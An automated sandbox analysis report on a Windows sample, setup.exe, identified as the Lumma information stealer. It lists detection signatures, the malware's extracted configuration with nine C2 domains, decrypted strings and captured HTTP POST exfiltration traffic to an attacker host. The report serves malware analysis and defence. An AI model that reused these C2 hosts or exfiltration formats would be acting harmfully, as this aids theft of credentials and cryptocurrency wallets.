Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1461307
MD5:864fb28b0001b98ddd896dbdc604db30
SHA1:2c7691795b4313704b79c3dfe70b956e84b45a11
SHA256:5de143343cc0a2b03f076de338308ac58eda529f6814a2e2266531d8ae09fbb0
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • setup.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 864FB28B0001B98DDD896DBDC604DB30)
    • RegAsm.exe (PID: 5592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 2436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 696 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["richardflorespoew.shop", "strwawrunnygjwu.shop", "justifycanddidatewd.shop", "raiseboltskdlwpow.shop", "falseaudiencekd.shop", "pleasurenarrowsdla.shop", "feighminoritsjda.shop", "marathonbeedksow.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@nevermoredielzt"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: RegAsm.exe PID: 5592JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: setup.exeAvira: detected
        Source: https://backcreammykiel.shop/DAvira URL Cloud: Label: malware
        Source: marathonbeedksow.shopAvira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop:443/apiCLSIDAvira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop/apiAvira URL Cloud: Label: malware
        Source: feighminoritsjda.shopAvira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop/api7Avira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop/apisAvira URL Cloud: Label: malware
        Source: backcreammykiel.shopAvira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop/Avira URL Cloud: Label: malware
        Source: https://backcreammykiel.shop/apiXEpqAvira URL Cloud: Label: malware
        Source: 1.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["richardflorespoew.shop", "strwawrunnygjwu.shop", "justifycanddidatewd.shop", "raiseboltskdlwpow.shop", "falseaudiencekd.shop", "pleasurenarrowsdla.shop", "feighminoritsjda.shop", "marathonbeedksow.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@nevermoredielzt"}
        Source: backcreammykiel.shopVirustotal: Detection: 8%Perma Link
        Source: marathonbeedksow.shopVirustotal: Detection: 14%Perma Link
        Source: https://backcreammykiel.shop/apiVirustotal: Detection: 16%Perma Link
        Source: justifycanddidatewd.shopVirustotal: Detection: 13%Perma Link
        Source: pleasurenarrowsdla.shopVirustotal: Detection: 13%Perma Link
        Source: richardflorespoew.shopVirustotal: Detection: 14%Perma Link
        Source: falseaudiencekd.shopVirustotal: Detection: 13%Perma Link
        Source: feighminoritsjda.shopVirustotal: Detection: 12%Perma Link
        Source: backcreammykiel.shopVirustotal: Detection: 8%Perma Link
        Source: strwawrunnygjwu.shopVirustotal: Detection: 13%Perma Link
        Source: raiseboltskdlwpow.shopVirustotal: Detection: 13%Perma Link
        Source: setup.exeReversingLabs: Detection: 81%
        Source: setup.exeVirustotal: Detection: 79%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: setup.exeJoe Sandbox ML: detected
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: richardflorespoew.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: strwawrunnygjwu.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: justifycanddidatewd.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: raiseboltskdlwpow.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: falseaudiencekd.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: pleasurenarrowsdla.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: feighminoritsjda.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: marathonbeedksow.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: backcreammykiel.shop
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
        Source: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString decryptor: LPnhqo--@nevermoredielzt
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415E52 CryptUnprotectData,1_2_00415E52
        Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49718 version: TLS 1.2
        Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B02953 FindFirstFileExW,0_2_00B02953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]1_2_004178F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 36E97270h1_2_0043A180
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_0040A2D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]1_2_00426B33
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_0041FB90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004153B5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004153B5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000A8h]1_2_00425E08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax+edx], cl1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 077DEFCDh1_2_00439790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000A88h]1_2_0041DFB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00410840
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, word ptr [ebp+eax*4+00h]1_2_00408800
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00410017
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, dx1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000F8h]1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+08h], edi1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+10h], 70526C4Ah1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]1_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+0Ch]1_2_0042290F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000F8h]1_2_00427124
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+10h]1_2_0042692A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx1_2_00415210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0040DAF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi], ebx1_2_00425280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al1_2_00425280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C58DD7F7h1_2_00439AA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_00437B72
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esp]1_2_00434B10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push edi1_2_00423BB3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_00424400
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc edi1_2_00412C82
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 02286B4Eh1_2_00439DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax1_2_00422DA7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E23F8252h1_2_0041C67E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]1_2_00425609
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000230h]1_2_0041061A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]1_2_00409E80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]1_2_00402E80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, esi1_2_004246A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [edx+esi]1_2_00434EB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000A8h]1_2_00425E02
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00430F70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]1_2_00425733
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+68h]1_2_004255C5

        Networking

        barindex
        Source: Malware configuration extractorURLs: richardflorespoew.shop
        Source: Malware configuration extractorURLs: strwawrunnygjwu.shop
        Source: Malware configuration extractorURLs: justifycanddidatewd.shop
        Source: Malware configuration extractorURLs: raiseboltskdlwpow.shop
        Source: Malware configuration extractorURLs: falseaudiencekd.shop
        Source: Malware configuration extractorURLs: pleasurenarrowsdla.shop
        Source: Malware configuration extractorURLs: feighminoritsjda.shop
        Source: Malware configuration extractorURLs: marathonbeedksow.shop
        Source: Malware configuration extractorURLs: backcreammykiel.shop
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15088Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20578Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5455Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1286Host: backcreammykiel.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568554Host: backcreammykiel.shop
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: backcreammykiel.shop
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop
        Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
        Source: RegAsm.exe, 00000001.00000002.2116693231.0000000003820000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2116139844.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/
        Source: RegAsm.exe, 00000001.00000002.2116693231.0000000003820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/D
        Source: RegAsm.exe, 00000001.00000002.2116436680.000000000167D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2116197394.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/api
        Source: RegAsm.exe, 00000001.00000002.2116197394.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/api7
        Source: RegAsm.exe, 00000001.00000002.2116436680.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/apiXEpq
        Source: RegAsm.exe, 00000001.00000002.2116436680.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop/apis
        Source: RegAsm.exe, 00000001.00000002.2116480868.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://backcreammykiel.shop:443/apiCLSID
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49718 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042E310 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_0042E310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042E310 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_0042E310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042EC21 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,1_2_0042EC21
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEC8100_2_00AEC810
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AF69260_2_00AF6926
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AF3AA00_2_00AF3AA0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AF1AF30_2_00AF1AF3
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B04B3E0_2_00B04B3E
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AE5CC00_2_00AE5CC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B06C640_2_00B06C64
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AFFEFD0_2_00AFFEFD
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AFBFF90_2_00AFBFF9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004178F01_2_004178F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004209401_2_00420940
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416ACF1_2_00416ACF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004053A01_2_004053A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D4E01_2_0041D4E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416EDE1_2_00416EDE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041FFEC1_2_0041FFEC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004397901_2_00439790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004088001_2_00408800
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004270D31_2_004270D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004380801_2_00438080
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004210AC1_2_004210AC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004071401_2_00407140
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004381C01_2_004381C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004012621_2_00401262
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041F2CC1_2_0041F2CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00439AA01_2_00439AA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004103C01_2_004103C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00437C021_2_00437C02
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406C301_2_00406C30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004384E01_2_004384E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00437D201_2_00437D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00439DF01_2_00439DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004325801_2_00432580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00421E791_2_00421E79
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041C67E1_2_0041C67E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00405EE01_2_00405EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004246A01_2_004246A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00434EB01_2_00434EB0
